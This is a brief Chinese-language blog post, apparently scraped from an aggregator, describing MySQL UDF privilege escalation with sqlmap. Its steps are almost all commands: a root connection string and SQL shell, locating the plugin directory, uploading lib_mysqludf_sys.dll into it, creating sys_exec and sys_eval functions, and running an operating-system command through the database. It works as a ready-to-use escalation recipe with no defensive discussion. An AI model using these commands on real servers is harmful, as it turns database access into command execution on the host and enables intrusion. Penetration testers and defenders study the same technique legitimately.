SQLMAP UDF提权

Posted websecyw

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQLMAP UDF提权相关的知识,希望对你有一定的参考价值。

SQLMAP UDF提权 

 
 
 1.连接mysql数据打开一个交互shell:

sqlmap.py -d mysql://root:[email protected]:3306/test --sql-shell
select @@version;
select @@plugin_dir;
d:\wamp2.5\bin\mysql\mysql5.6.17\lib\plugin\

2.利用sqlmap上传lib_mysqludf_sys到MySQL插件目录:
sqlmap.py -d mysql://root:[email protected]:3306/test --file-write=d:/tmp/lib_mysqludf_sys.dll --file-dest=d:\wamp2.5\bin\mysql\mysql5.6.17\lib\plugin\lib_mysqludf_sys.dll
CREATE FUNCTION sys_exec RETURNS STRING SONAME ‘lib_mysqludf_sys.dll‘
CREATE FUNCTION sys_eval RETURNS STRING SONAME ‘lib_mysqludf_sys.dll‘
select sys_eval(‘ver‘);








以上是关于SQLMAP UDF提权的主要内容,如果未能解决你的问题,请参考以下文章

Mysql提权-基于Mysql的UDF提权(Linux系统)

sqlmap注入及ms16-075提权总结

MySQL UDF提权获取主机控制权

Sqlmap使用及提权

SQLMAP深入分析-使用篇(基础使用进阶命令tamper脚本)

SQLMAP深入分析-使用篇(基础使用进阶命令tamper脚本)